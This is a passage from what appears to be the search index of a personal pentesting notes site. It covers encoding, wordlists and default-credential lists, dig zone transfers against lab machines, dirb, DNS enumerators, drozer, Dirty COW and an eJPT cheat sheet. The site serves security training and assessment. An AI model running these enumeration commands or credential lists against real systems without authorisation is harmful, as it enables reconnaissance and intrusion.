                        • Unreserved Chars- [a-zA-z] [0-9] [- . _ ~]
                        • Reserved Chars - : / ? # [ ] @ ! $ & \" ( ) * + , ; = %

                        Other characters are encoded by the use of a percent char (%) plus two hexadecimal digits. Although it appears to be a security feature, URL-encoding is not. It is only a method used to send data across the Internet but, it can lower (or enlarge) the attack surface (in some cases).

                        Generally, web browsers (and other client-side components) automatically perform URL-encoding and, if a server-side script engine is present, it will automatically perform URL-decoding.

                        %23 # %3F ? %24 & %25 % %2F / %2B + <space> %20 or +

                        URL encoding is defined in the meta tag content type:

                        # before HTML5\n<meta http-equiv=\"Content-Type\"Content=\"text/html\";charset=\"utf-8\">\n\n# With HTML5\n<meta charset=\"utf-8\">\n

                        This is how you define that HTML meta tag in some languages:

                        # PHP\nheader('Content-type: text/html; charset=utf8');\n\n# ASP.NET\n<%Response.charset=\"utf-8\"%>\n\n# JSP\n<%@ page contentType=\"text/html; charset=UTF-8\" %>\n
                        "},{"location":"data-encoding/#base64-encoding","title":"Base64 encoding","text":"

                        Base64 is an schema that allows any binary data (images, audio files, and other non-text data) to be safely represented by using solely printable ASCII characters.

                        Base64 is commonly used for encoding email attachtment for safe transmission over SMTP. It's also used for encoding user credentials in basic HTTP authentication.

                        "},{"location":"data-encoding/#how-it-works","title":"How it works","text":"

                        Encoding

                        Base64 encoding processes input data in blocks of 3 bytes. It divides these 24 bits into 4 chunks of six bits each. With these 64 different possible permutations (for the six bits) it can represent the following character set:

                        ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\n

                        Different variations of Base64 encoding may use different characters for the last two positions (+ and /).

                        If the final block of input data results in less than 3 chunks of output data, the the output is padded with one or two equal signs characters.

                        Decoding

                        Base64 decoding is the reverse process. The encoded Base64 string is divided into segments of four characters. Each character is converted back to its 6-bit value, and these values are combined to reconstruct the original binary data.

                        Use cases

                        • Binary Data in Text Contexts: Web applications often deal with binary data such as images, audio, or files. Since URLs, HTML, and other text-based formats can't directly handle binary data, Base64 encoding is used to represent this binary data as text. This allows binary data to be included in places that expect text, such as in HTML or JSON responses.
                        • Data URL Embedding: Data URLs are a way to embed small resources directly into the HTML or CSS code. These URLs include the actual resource data in Base64-encoded form, eliminating the need for separate HTTP requests. For example, an image can be embedded directly in the HTML using a Data URL.
                        • Minimization of Requests: By encoding small images or icons as Data URLs within CSS or HTML, web developers can reduce the number of requests made to the server, potentially improving page load times.
                        • Simplification of Resource Management: Embedding resources directly into HTML or CSS can simplify resource management and deployment. Developers don't need to worry about file paths or URLs.
                        • Offline Storage: In certain offline or single-page applications, Base64-encoded data can be stored in local storage or indexedDB for quick access without the need to fetch resources from the server.

                        Encoding/decoding in Base64:

                        # PHP Example\nbase64_encode('encode this string');\nbase64_decode('ZW5jb2RlIHRoaXMgc3RyaW5n');\n\n# Javascript example\nwindow.btoa('encode this string');\nwindow.atob('ZW5jb2RlIHRoaXMgc3RyaW5n');\n\n# Handling Unicode in javascript requires previous encoding. The escapes and encodings are required to avoid exceptions with characters out of range\nwindow.btoa(encodeURIComponent(escape ('encode this string') ));\nwindow.atob(decodeURIComponent(escape ('ZW5jb2RlIHRoaXMgc3RyaW5n') ));\n
                        "},{"location":"data-encoding/#base-36-encoding-scheme","title":"Base 36 encoding scheme","text":"

                        It's the most compact, case-insensitive, alphanumeric numeral system using ASCII characters. The scheme's alphabet contains all digits [0-9] and Latin letters [A-Z].

                        Base 10 Base 36 1294870408610 GIUSEPPE

                        Base 36 Encoding scheme is used in many real-world scenarios.

                        Converting Base36 to decimal:

                        # Number Base36 OHPE to decimal base\n\n# PHP Example: base_convert()\nbase_convert(\"OHPE\",36,10);\n\n# Javascript example: toString\n(1142690).toString(36)\nparseInt(\"ohpe\",36)\n
                        "},{"location":"data-encoding/#visual-spoofing-attack","title":"Visual spoofing attack","text":"

                        It's one of the possible attacks that can be perform with unicode:

                        A tool for generating visual spoofing attacks: https://www.irongeek.com/homoglyph-attack-generator.php

                        Paper

                        "},{"location":"data-encoding/#multiple-encodingsdecodings","title":"Multiple encodings/decodings","text":"

                        Sometimes encoding and decoding is used multiple times. This can also be used to bypass security measures.

                        "},{"location":"dictionaries/","title":"Dictionaries","text":"","tags":["web pentesting","dictionary","tools"]},{"location":"dictionaries/#lists-of-my-most-used-dictionaries","title":"Lists of my most used dictionaries","text":"Dictionary Link Description Intended for Dotdotpwn https://github.com/wireghoul/dotdotpwn It's a very flexible intelligent fuzzer to discover traversal directory vulnerabilities in software such as HTTP/FTP/TFTP servers, Web platforms such as CMSs, ERPs, Blogs, etc. Traversal directory Payload all the things https://github.com/swisskyrepo/PayloadsAllTheThings many different resources and cheat sheets for payload generation and general methodology. Rockyou /usr/shared/wordlists/rockyou.txt.gz RockYou was a company that developed widgets for MySpace and implemented applications for various social networks and Facebook. Since 2014, it has engaged primarily in the purchases of rights to classic video games; it incorporates in-game ads and re-distributes the games. User agents Seclist Intended to bypass rate limiting (in an API) User-agent headers Windows Files My dictionaty repo To read interesting files from windows machines Intended for information disclosure Default Credential Cheat sheets https://github.com/ihebski/DefaultCreds-cheat-sheet Install and run \"python3.11 creds search <service>\"","tags":["web pentesting","dictionary","tools"]},{"location":"dictionaries/#installing-wordlists-in-your-kali","title":"Installing wordlists in your kali","text":"
                        # This package contains the rockyou.txt wordlist and has an installation size of 134 MB.\nsudo apt install wordlists\n

                        You will be adding:

                        /usr/share/wordlists\n|-- amass -> /usr/share/amass/wordlists\n|-- brutespray -> /usr/share/brutespray/wordlist\n|-- dirb -> /usr/share/dirb/wordlists\n|-- dirbuster -> /usr/share/dirbuster/wordlists\n|-- dnsmap.txt -> /usr/share/dnsmap/wordlist_TLAs.txt\n|-- fasttrack.txt -> /usr/share/set/src/fasttrack/wordlist.txt\n|-- fern-wifi -> /usr/share/fern-wifi-cracker/extras/wordlists\n|-- john.lst -> /usr/share/john/password.lst\n|-- legion -> /usr/share/legion/wordlists\n|-- metasploit -> /usr/share/metasploit-framework/data/wordlists\n|-- nmap.lst -> /usr/share/nmap/nselib/data/passwords.lst\n|-- rockyou.txt.gz\n|-- seclists -> /usr/share/seclists\n|-- sqlmap.txt -> /usr/share/sqlmap/data/txt/wordlist.txt\n|-- wfuzz -> /usr/share/wfuzz/wordlist\n`-- wifite.txt -> /usr/share/dict/wordlist-probable.txt\n
                        ","tags":["web pentesting","dictionary","tools"]},{"location":"dictionaries/#installing-seclist","title":"Installing seclist","text":"
                        git clone https://github.com/danielmiessler/SecLists\n\nsudo apt install seclists -y\n
                        ","tags":["web pentesting","dictionary","tools"]},{"location":"dictionaries/#dictionary-generators","title":"Dictionary generators","text":"
                        • crunch.
                        • cewl.
                        • Common User Password Profiler: CUPP.
                        • Username Anarchy.
                        ","tags":["web pentesting","dictionary","tools"]},{"location":"dictionaries/#more-dictionaries","title":"More dictionaries","text":"
                        • Dictionaries for cracking passwords: https://wiki.skullsecurity.org/index.php/Passwords.
                        • [Wordlist from wfuzz](https://github.com/xmendez/wfuzz/tree/master/wordlist.
                        ","tags":["web pentesting","dictionary","tools"]},{"location":"dictionaries/#default-credentials","title":"Default credentials","text":"

                        Install app \"Cred\" from: https://github.com/ihebski/DefaultCreds-cheat-sheet

                        pip3 install defaultcreds-cheat-sheet\n\npython3.11 creds search tomcat\n
                        ","tags":["web pentesting","dictionary","tools"]},{"location":"dig/","title":"dig","text":"

                        References: dig (https://linux.die.net/man/1/dig)

                        ","tags":["pentesting","dns","enumeration","tools"]},{"location":"dig/#footprinting-dns-with-dig","title":"Footprinting DNS with dig","text":"
                        # Querying: A Records for a Subdomain\n dig a www.example @$ip\n # here, $ip refers to ip of DNS server\n\n# Get email of administrator of the domain\ndig soa www.example.com\n# The email will contain a (.) dot notation instead of @\n\n# ENUMERATION\n# List nameservers known for that domain\ndig ns example.com @$ip\n# -ns: other name servers are known in NS record\n#  `@` character specifies the DNS server we want to query.\n# here, $ip refers to ip of DNS server\n\n# View all available records\ndig any example.com @$ip\n # here, $ip refers to ip of DNS server. The more recent RFC8482 specified that `ANY` DNS requests be abolished. Therefore, we may not receive a response to our `ANY` request from the DNS server.\n\n# Display version. query a DNS server's version using a class CHAOS query and type TXT. However, this entry must exist on the DNS server.\ndig CH TXT version.bind $ip\n\n# Querying: PTR Records for an IP Address\ndig -x $ip @1.1.1.1\n# You can also facilitate a range:\ndig -x 192.168 @1.1.1.1\n\n# Querying: TXT Records\ndig txt example.com @$ip\n\n# Querying: MX Records\ndig mx example.com @1.1.1.1\n
                        ","tags":["pentesting","dns","enumeration","tools"]},{"location":"dig/#dig-axfr","title":"dig axfr","text":"

                        dig is a DNS lookup utility but combined with \"axfr\" is used to do DNS zone transfer. This procedure is abbreviated Asynchronous Full Transfer Zone (AXFR), which is the protocol used during a DNS zone transfer.

                        Basically, in a DNS query a client provide a human-readable hostname and the DNS server responses with an IP address.

                        Quick syntax for zone transfers:

                        dig axfr actualtarget @nameserver \n\n# You can also solicitate the transfer of reverse DNS query_\n dig axfr -x 192.168  @ip\n
                        ","tags":["pentesting","dns","enumeration","tools"]},{"location":"dig/#what-is-a-dns-zone","title":"What is a DNS zone?","text":"

                        DNS servers host zones. One example of a DNS zone might be example.com and all its subdomains. However secondzone.example.com can also be a separated zone.

                        A zone file is a text file that describes a DNS zone with the BIND file format. In other words it is a point of delegation in the DNS tree. The BIND file format is the industry-preferred zone file format and is now well established in DNS server software. A zone file describes a zone completely.

                        ","tags":["pentesting","dns","enumeration","tools"]},{"location":"dig/#why-is-dns-zone-transfer-needed","title":"Why Is DNS Zone Transfer Needed","text":"

                        DNS is a critical service. If a DNS server for a zone is not working and cached information has expired, the domain is inaccessible to all services (web, mail, and more). Therefore, each zone should have at least two DNS servers. For more critical zones, there may be even more.

                        However, a zone may be large and may require frequent changes. If you manually edit zone data on each server separately, it takes a lot of time and there is a a lot of potential for a mistake. This is why DNS zone transfer is needed.

                        You can use different mechanisms for DNS zone transfer but the simplest one is AXFR (technically speaking, AXFR refers to the protocol used during a DNS zone transfer). It is a client-initiated request. Therefore, you can edit information on the primary DNS server and then use AXFR from the secondary DNS server to download the entire zone.

                        Synchronization between the servers involved is realized by zone transfer. Using a secret key rndc-key, which we have seen initially in the default configuration, the servers make sure that they communicate with their own master or slave. A DNS server that serves as a direct source for synchronizing a zone file is called a master. A DNS server that obtains zone data from a master is called a slave. A primary is always a master, while a secondary can be both a slave and a master. For some Top-Level Domains (TLDs), making zone files for the Second Level Domains accessible on at least two servers is mandatory.

                        Initiating an AXFR zone-transfer request from a secondary server is as simple as using the following dig commands, where zonetransfer.me is the domain that we want to initiate a zone transfer for. First, we will need to get the list of DNS servers for the domain.

                        dig axfr example.htb @$ip\n

                        If the administrator used a subnet for the allow-transfer option for testing purposes or as a workaround solution or set it to any, everyone would query the entire zone file at the DNS server.

                        If misconfigured and left unsecured, this functionality can be abused by attackers to copy the zone file from the primary DNS server to another DNS server. A DNS Zone transfer can provide penetration testers with a holistic view of an organization's network layout. Furthermore, in certain cases, internal network addresses may be found on an organization's DNS servers.

                        ","tags":["pentesting","dns","enumeration","tools"]},{"location":"dig/#htb-machines","title":"HTB machines","text":"

                        Some HackTheBox machines exploits DNS zone transfer:

                        In the example of Friendzone machine, accessible web page on port 80 provides an email in which a different domain is appreciated. Also port 53 is open, which is an indicator of some possible DNS zone transfer.

                        In friendzone, we will transfer our zone to all zones spotted in different scanners:

                        # friendzone.red was spotted in the nmap scan. Transferring 10.129.228.87 zone to friendzone.red\ndig axfr friendzone.red @10.129.228.87\n\n# Also friendzoneportal.red was spotted in the email that appeared on http://10.129.228.87. Transferring 10.129.228.87 zone to friendzoneportal.red:\ndig axfr friendzoneportal.red @10.129.228.87\n
                        ","tags":["pentesting","dns","enumeration","tools"]},{"location":"dirb/","title":"dirb - A web content enumeration tool","text":"

                        DIRB is a web content fingerprinting tool. It scans the server for directories using a dictionary file.

                        Scan the web server (http://192.168.1.224/) for directories using a dictionary file (/usr/share/wordlists/dirb/common.txt):

                        ","tags":["pentesting","directory enumeration","tool","vulnerability"]},{"location":"dirb/#dictionaries","title":"Dictionaries","text":"

                        See dictionaries in this repo.

                        Path to default dictionary: /usr/share/dirb/wordlists/

                        ","tags":["pentesting","directory enumeration","tool","vulnerability"]},{"location":"dirb/#basic-commands","title":"Basic commands","text":"
                        dirb <HOST>  /path/to/dictionary.txt -o results.txt\n# No flag needed to specify path to dictionary.\n# -o: to print results to a file.\n# -a: agent application. In case that the app checks out this header (use it with https://useragentstring.com/pages/useragentstring.php)\n# -p: for indicating a proxy (for instance, Burp: dirb <target host or IP> -p http://127.0.0.1:8080)\n# -c: it adds a cookie (dirb <target host or IP> -c \u201cMYCOOKIE: ashdkjashdjkas\u201d)\n# -H: it adds a customized header (dirb <target host or IP> -H \u201cMYHEADER: Mycontent\u201d)\n# -r: don\u2019t search recursively in directories\n# -z: it adds a millisecond delay to not cause excessive Flood.\n# -S: silent mode. It doesn\u2019t show tested words.\n# -X: It allows us to specify extensions (dirb <target host or IP> -X \u201c.php, .bak\u201d). Appends each word with this extension\n# -x:  It allows us to use a file with extensions (dirb <target host or IP> -x extensionfile.txt). Appends each word with the extensions specified in the file\n# -o: to save the results in an output file\n
                        ","tags":["pentesting","directory enumeration","tool","vulnerability"]},{"location":"dirty-cow/","title":"Dirty COW (Copy On Write)","text":"

                        A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. All the information we have so far is included in this page.

                        An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.

                        This flaw allows an attacker with a local system account to modify on-disk binaries, bypassing the standard permission mechanisms that would prevent modification without an appropriate permission set.

                        ","tags":["pentesting","linux","privileges escalation"]},{"location":"dirty-cow/#exploitation","title":"Exploitation","text":"

                        List of PoCs: https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs.

                        ","tags":["pentesting","linux","privileges escalation"]},{"location":"dirty-cow/#resources","title":"Resources","text":"
                        • https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails.
                        ","tags":["pentesting","linux","privileges escalation"]},{"location":"django-pentesting/","title":"django pentesting","text":"

                        The following Github repository describes OWASP Top10 for Django: https://github.com/boomcamp/django-security

                        ","tags":["python","django","pentesting","web pentesting"]},{"location":"dnscan/","title":"dnscan - A DNS subdomain scanner","text":"

                        dnscan is a python wordlist-based DNS subdomain scanner.

                        The script will first try to perform a zone transfer using each of the target domain's nameservers.

                        If this fails, it will lookup TXT and MX records for the domain, and then perform a recursive subdomain scan using the supplied wordlist.

                        ","tags":["scanning","domain","subdomain","reconnaissance","pentesting"]},{"location":"dnscan/#installation","title":"Installation","text":"

                        Requirements: dnscan requires Python 3, and the netaddr (version 0.7.19 or greater) and dnspython (version 2.0.0 or greater) libraries.

                        git clone https://github.com/rbsec/dnscan\ncd dnscan\npip install -r requirements.txt\n
                        ","tags":["scanning","domain","subdomain","reconnaissance","pentesting"]},{"location":"dnscan/#usage","title":"Usage","text":"
                        dnscan.py (-d \\<domain\\> | -l \\<list\\>) [OPTIONS]\n# Mandatory Arguments\n#    -d  --domain                              Target domain; OR\n#    -l  --list                                Newline separated file of domains to scan\n
                        ","tags":["scanning","domain","subdomain","reconnaissance","pentesting"]},{"location":"dnscan/#optional-arguments","title":"Optional Arguments","text":"
                        -w --wordlist <wordlist>                  Wordlist of subdomains to use\n-t --threads <threadcount>                Threads (1 - 32), default 8\n-6 --ipv6                                 Scan for IPv6 records (AAAA)\n-z --zonetransfer                         Perform zone transfer and exit\n-r --recursive                            Recursively scan subdomains\n   --recurse-wildcards                    Recursively scan wildcards (slow)\n\n-m --maxdepth                             Maximum levels to scan recursively\n-a --alterations                          Scan for alterations of subdomains (slow)\n-R --resolver <resolver>                  Use the specified resolver instead of the system default\n-L --resolver-list <file>                 Read list of resolvers from a file\n-T --tld                                  Scan for the domain in all TLDs\n-o --output <filename>                    Output to a text file\n-i --output-ips <filename>                Output discovered IP addresses to a text file\n-n --nocheck                              Don't check nameservers before scanning. Useful in airgapped networks\n-q --quick                                Only perform the zone transfer and subdomain scans. Suppresses most file output with -o\n-N --no-ip                                Don't print IP addresses in the output\n-v --verbose                              Verbose output\n-h --help                                 Display help text\n

                        Custom insertion points can be specified by adding %% in the domain name, such as:

                        dnscan.py -d dev-%%.example.org\n
                        ","tags":["scanning","domain","subdomain","reconnaissance","pentesting"]},{"location":"dnsenum/","title":"dnsenum - A tool to enumerate DNS","text":"

                        multithreaded perl script to enumerate DNS information of a domain and to discover non-contiguous ip blocks.

                        ","tags":["pentesting","dns","enumeration","tools"]},{"location":"dnsenum/#installation","title":"Installation","text":"

                        Download from the github repo: https://github.com/fwaeytens/dnsenum.

                        ","tags":["pentesting","dns","enumeration","tools"]},{"location":"dnsenum/#basic-usage","title":"Basic usage","text":"

                        Used for active fingerprinting:

                        dnsenum domain.com\n

                        One cool thing about dnsenum is that it can perform dns transfer zone, like [dig]](dig.md).

                        It performs DNS brute force with /usr/share/dnsenum/dns.txt.

                        ","tags":["pentesting","dns","enumeration","tools"]},{"location":"dnspy/","title":"DNSpy - A .NET decompiler for windows","text":"

                        Download it from: https://github.com/dnSpy/dnSpy/releases

                        You can use dnsSpy to determine if application is .NET executables or native code. If DNSpy decompiles the file .exe, then it means that\u2019s .NET executable.

                        Finding a .NET decompiler for Linux

                        There are well-known decompilers out there. For windows you have dnSpy and many more. In linux you have the open source ILSpy. BUT: Installation required some dependencies. There were more tools (wine).

                        ","tags":["pentesting"]},{"location":"dnsrecon/","title":"DNSRecon","text":"

                        Preinstalled with Linux: dsnrecon is a simple python script that enables to gather DNS-oriented information on a given target.

                        ","tags":["pentesting","dns","enumeration","tools"]},{"location":"dnsrecon/#basic-usage","title":"Basic usage","text":"
                        dnsrecon -d example.com\n
                        ","tags":["pentesting","dns","enumeration","tools"]},{"location":"docker/","title":"docker","text":"","tags":["docker"]},{"location":"docker/#installation","title":"Installation","text":"

                        To make sure that I have docker engine, docker compose and nginx installed.

                        sudo apt install docker docker-compose nginx\n

                        Depending on the image you are going to compose you will need nginx or other dependencies.

                        ","tags":["docker"]},{"location":"docker/#basic-commands","title":"Basic commands","text":"
                        # show all processes \ndocker ps -a\n\n# Actions on dockerInstance/PID/part of id if unique: restart, stop, start, status\nsudo docker <restart/stop/start/status> <nameOfDockerInstance/PID/partOfIDifUnique>\n\n# Create the first docker instance: Hello, world! It gets the setting from docker.hub\nsudo docker run hello-world\n# run: build and deploy an instance\n# by default, docker saves everything in /var/lib/docker\n\n# Execute commands in an already running docker instance. You can execute a terminal or a command. \nsudo docker run -it <image> <echo lala / bf bash>\n# image: for instance, debian\n# <echo lala or bf bash>: command echo lala. Or terminal in bash\n
                        ","tags":["docker"]},{"location":"dotpeek/","title":"dotPeek - A tool for decompiling","text":"

                        dotPeek is a tool by JetBrains.

                        "},{"location":"dotpeek/#installation","title":"Installation","text":"

                        Download from: https://www.jetbrains.com/es-es/decompiler/download/#section=web-installer

                        "},{"location":"dread/","title":"Microsoft DREAD","text":"

                        Microsoft DREAD. DREAD is a risk assessment system developed by Microsoft to help IT security professionals evaluate the severity of security threats and vulnerabilities. It is used to perform a risk analysis by using a scale of 10 points to assess the severity of security threats and vulnerabilities. With this, we calculate the risk of a threat or vulnerability based on five main factors:

                        • Damage Potential
                        • Reproducibility
                        • Exploitability
                        • Affected Users
                        • Discoverability
                        ","tags":["dread","cvss"]},{"location":"drozer/","title":"drozer - A security testing framework for Android","text":"

                        drozer (formerly Mercury) is the leading security testing framework for Android.

                        drozer allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps' IPC endpoints and the underlying OS.

                        drozer provides tools to help you use, share and understand public Android exploits. It helps you to deploy a drozer Agent to a device through exploitation or social engineering.

                        ","tags":["mobile pentesting"]},{"location":"drozer/#installation","title":"Installation","text":"

                        Instructions from: https://github.com/WithSecureLabs/drozer

                        Also, you can download it from: https://github.com/FSecureLABS/drozer/releases/download/2.3.4/drozer-agent-2.3.4.apk

                        adb install drozer-agent-2.3.4.apk\npip install twisted\n

                        Prerequisites: JDK 1.6, python2.7, Android SDK, adb, java 1.6.

                        Note: Java 1.6 is mandatory since Android bytecode is only compliant to version 1.6 and no higher.

                        1. Install genymotion and get a device, for instance a samsung galaxy S6, running in the virtualbox.
                        2. Go to drozer app ant turn on servers. You will get a message on the app saying that port 31415 is now on.
                        3. From the terminal, we redirect the port with:
                          adb connect IPDevice:PORT\nadb forward tcp:31415 tcp:31415\n
                        4. No we connect to drozer console:
                          drozer console connect\n

                        For this to work, we need to have:

                        • device set on Host-Only + Nat mode.
                        • Kali set on Host-Only + Nat mode.

                        Also, connections need to be running on the same interfaces (ethn).

                        ","tags":["mobile pentesting"]},{"location":"drozer/#basic-commands","title":"Basic commands","text":"

                        These commands run on a drozer terminal:

                        # Display the apps installed on the device.\nrun app.package.list\n\n# Display only the apps with identifier lala\nrun app.package.list -f lala\n\n# Log debug information\nlog.d\n\n# Log system information\nlog.i\n\n# Log error information\nlog.e\n
                        ","tags":["mobile pentesting"]},{"location":"drozer/#basic-commands-on-packages","title":"Basic commands on packages","text":"
                        # Display available commands.\nrun + TAB\n\n# Show the manifest of a given app.\nrun app.package.manifest nameOfApp\n\n# Show generic information about the app\nrun app.package.info -a nameOfApp\n\n# Display surface, a resume of activities, component providers, services, exported activities and if it is debugable.\nrun app.package.attacksurface nameOfApp\n
                        ","tags":["mobile pentesting"]},{"location":"drozer/#basic-commands-on-activities","title":"Basic commands on activities","text":"
                        # Show generic information about the activities\nrun app.activity.info -a nameOfApp\n\n# Display an activity on a device\nrun app.activity.start --component nameOfApp nameOfApp.nameOfActivity\n
                        ","tags":["mobile pentesting"]},{"location":"drozer/#basic-commands-on-providers","title":"Basic commands on providers","text":"
                        # Display existing providers.\nrun app.provider.info -a nameOfApp\n\n# Display the location of providers. It uses content:// protocol\nrun app.providers.finduri nameOfApp\n\n# Display the database information of the provider.\nrun app.provider.query uriOfProvider\n
                        ","tags":["mobile pentesting"]},{"location":"drozer/#basic-commands-on-scanners","title":"Basic commands on scanners","text":"
                        # To see all tests and scans you can run with drozer on your app.\nrun scanner. +TAB\n\n# Test the app to see if it is vulnerable to an injection.\nrun scanner.provider.injection -a nameOfApp\n\n# Check out if the App is vulnerable to a traversal attack\nrun scanner.provider.traversal -a nameOfApp\n
                        ","tags":["mobile pentesting"]},{"location":"echo-mirage/","title":"Echo Mirage","text":"","tags":["windows","thick applications","traffic tool"]},{"location":"echo-mirage/#installation","title":"Installation","text":"

                        Download from

                        Google Drive:

                        https://drive.google.com/open?id=1JE70HH-CNd_VIl190sheL72w3P5dYK58

                        Mega.nz:

                        https://mega.nz/#!lRtUzApC!2hBLDnNiOZJ87Z9kmgFfwDLDvWZUBixGpZrTVtuYHSI

                        ","tags":["windows","thick applications","traffic tool"]},{"location":"ejpt/","title":"eJPT - eLearnSecurity Junior Penetration Tester Cheat Sheet","text":"

                        What is eJPT? The eJPT is\u00a0a 100% hands-on certification for penetration testing and essential information security skills.

                        I'm more than happy to share my personal cheat sheet of the #eJPT Preparation exam.

                        ","tags":["pentesting"]},{"location":"ejpt/#subdomain-enumeration","title":"Subdomain enumeration","text":"Tool + Cheat sheet What it does Google dorks Google hacking, also named Google dorking, is a hacker technique that uses Google Search and other Google applications to find security holes in the configuration and computer code that websites are using. Sublist3r Sublist3r enumerates subdomains using many search engines such as Google, Yahoo, Bing, Baidu and Ask. Sublist3r also enumerates subdomains using Netcraft, Virustotal, ThreatCrowd, DNSdumpster and ReverseDNS. crt.sh It collects information about SSL certificates. If you visit a domain and it contains a certificate you can extract other subdomain by using the View Certificate functionality. dnscan Python wordlist-based DNS subdomain scanner. amass In depth DNS Enumeration and network mapping.","tags":["pentesting"]},{"location":"ejpt/#footprinting-scanning","title":"Footprinting & Scanning","text":"Tool + Cheat sheet What it does ping ping works by sending one or more special ICMP packets (Type 8 - echo request) to a host. If the destination host replies with ICMP echo reply packets, then the host is alive. fping Linux tool which is an improved version of the ping utility. nmap Network Mapper is an open source tool for network exploration and security auditing. Free and open-source scanner created by Gordon Lyon. Nmap is used to discover hosts and services on a computer network by sending packages and analyzing the responses. p0f P0f is a tool that utilizes an array of sophisticated, purely passive traffic fingerprinting mechanisms to identify the players behind any incidental TCP/IP communications (often as little as a single normal SYN) without interfering in any way. masscan Masscan was designed to deal with large networks and to scan thousands of Ip addresses at once. It\u2019s faster than nmap but probably less accurate.","tags":["pentesting"]},{"location":"ejpt/#enumeration-tools","title":"Enumeration tools","text":"Tool + Cheat sheet URL dirb DIRB is a web content fingerprinting tool. It scans the web server for directories using a dictionary file feroxbuster FEROXBUSTER is a web content fingerprintinf tool that uses brute force combined with a wordlist to search for unlinked content in target directories. httprint HTTPRINT is a web server fingerprinting tool. It identifies web servers and detects web enabled devices which do not have a server banner string, such as wireless access points, routers, switches, cable modems, etc. wpscan WPSCAN is a wordpress security scanner.","tags":["pentesting"]},{"location":"ejpt/#dictionaries","title":"Dictionaries","text":"

                        List of dictionaries.

                        Tool + Cheat sheet What it does crunch Generate combinations of words and manglings to be used later off as attacking dictionaries.","tags":["pentesting"]},{"location":"ejpt/#vulnerability-assessment-scanners","title":"Vulnerability assessment: scanners","text":"Available scanners + Cheat sheet URL Nessus https://www.tenable.com/downloads/nessus OpenVAS https://www.openvas.org/ Nexpose https://www.rapid7.com/products/nexpose/ GFOLAnGuard https://www.gfi.com/products-and-solutions/network-security-solutions/gfi-languard","tags":["pentesting"]},{"location":"ejpt/#toolstecniques-for-network-exploitation","title":"Tools/tecniques for network exploitation","text":"Tool + Cheat sheet What it does netcat netcat (often abbreviated to nc) is a computer networking utility for reading from and writing to network connections using TCP or UDP. openSSL OpenSSL is a software library for applications that provide secure communications over computer networks against eavesdropping or need to identify the party at the other end. It is widely used by Internet servers, including the majority of HTTPS websites. Registry creation Registries in the victim machine may be used to save a connection to the attacker machine.","tags":["pentesting"]},{"location":"ejpt/#web-pentesting","title":"Web pentesting","text":"Vulnerability / Technique What it does Tool Backdoors with netcat Buffer Overflow attacks A buffer is an area in the RAM (Random Access Memory) reserved for temporary data storage. If a developer does not enforce buffer\u2019s limits, an attacker could find a way to write data beyond those limits. Remote Code Execution RCE\u00a0attacks involve attackers manipulating network traffic by exploiting code vulnerabilities to access a corporate system. XSS attack - Cross-site Scripting attack Cross-Site Scripting attacks or XSS attacks enable attackers to inject client-side scripts into web pages. This is done through an URL than the attacker sends. Crafted in the URL, this js payload is injected. xsser SQL injection SQL stands for Structure Query Language. SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. sqlmap","tags":["pentesting"]},{"location":"ejpt/#password-cracker","title":"Password cracker","text":"Tool + Cheat sheet What it does ophcrack Ophcrack is a free Windows password cracker based on rainbow tables. It is a efficient implementation of rainbow tables. It comes with a Graphical User Interface and runs on multiple platforms. hashcat Hashcat is a password recovery tool. It had a proprietary code base until 2015, but was then released as open source software. Versions are available for Linux, OS X, and Windows. wikipedia. John the Ripper John the Ripper is one of those tools that can be used for several things: hash cracker and dictionary attack. hydra Hydra can attack nearly 50 services including: Cisco auth, FTP, HTTP, IMAP, RDP, SMB, SSH, Telnet... It uses modules for each protocol.","tags":["pentesting"]},{"location":"ejpt/#dictionary-attacks","title":"Dictionary attacks","text":"Tool + Cheat sheet What it does John the Ripper John the Ripper is one of those tools that can be used for several things: hash cracker and dictionary attack. hydra Hydra can attack nearly 50 services including: Cisco auth, FTP, HTTP, IMAP, RDP, SMB, SSH, Telnet... It uses modules for each protocol.","tags":["pentesting"]},{"location":"ejpt/#windows","title":"Windows","text":"

                        Introduction about NetBIOS.

                        Vulnerability / Technique What it does Tools Null session attack This attack exploits an authentification vulnerability for Windows Administrative Shares. Manual attack, Winfo, enum, enum4linux, samrdump.py, nmap script Arp poisoning This attack is performed by sending gratuitous ARP replies. arpspoof Remote Code Execution RCE\u00a0attacks involve attackers manipulating network traffic by exploiting code vulnerabilities to access a corporate system. Burpsuite and Wireshark","tags":["pentesting"]},{"location":"ejpt/#linux","title":"Linux","text":"

                        Spawn a shell. msfvenom.

                        ","tags":["pentesting"]},{"location":"ejpt/#lateral-movements","title":"Lateral movements","text":"

                        Lateral movements

                        ","tags":["pentesting"]},{"location":"emacs/","title":"emacs - A text editor... and more","text":""},{"location":"emacs/#syntax","title":"Syntax","text":"

                        Before starting, it is convenient to consider the syntax we'll be using:

                        C-<char> \nWe'll keep press CTRL key and at the same time a character.\n\nM-<char>\nWe'll keep press ALT key and at the same time a character.\n\nESC <char>\nWe'll press ESC key, and after that we'll press the character.\n\nC <char>\nWe'll press CTRL key, and after that we'll press the character.\n\nM <char>\nWe'll press ALT key, and after that we'll press the character.\n
                        "},{"location":"emacs/#basic-commands","title":"Basic commands","text":"

                        Disclaimer: when creating this cheat sheet, I've realized that I'm totally in love with emacs, meaning this article is full of bias comments. Neutrality is overrated.

                        "},{"location":"emacs/#session-and-process-management","title":"Session and process management","text":"
                         # Close session. It will ask if you want to save the buffers.\nC-x C-c\n\n# Cancel a running process.\nC-g\n\n# Remove all open windows and expand the windows that contains the active cursor position \nC-x 1\n
                        "},{"location":"emacs/#cursor-movement","title":"Cursor Movement","text":"

                        A difference with vim or neovim editor, \"cursor mode\" and \"insert mode\" go together in emacs, meaning you will be able to insert any character from whenever the cursor is without having to switch from one mode to another.

                        There is also a small but big difference. Emacs includes a blank character at the end of the line. This alone can sound very vague, but it allows you to move in a more natural and human way from the beginning of one line to the end of the previous one. Just this silly feature makes me love more emacs than vim (#sorryVimDudes).

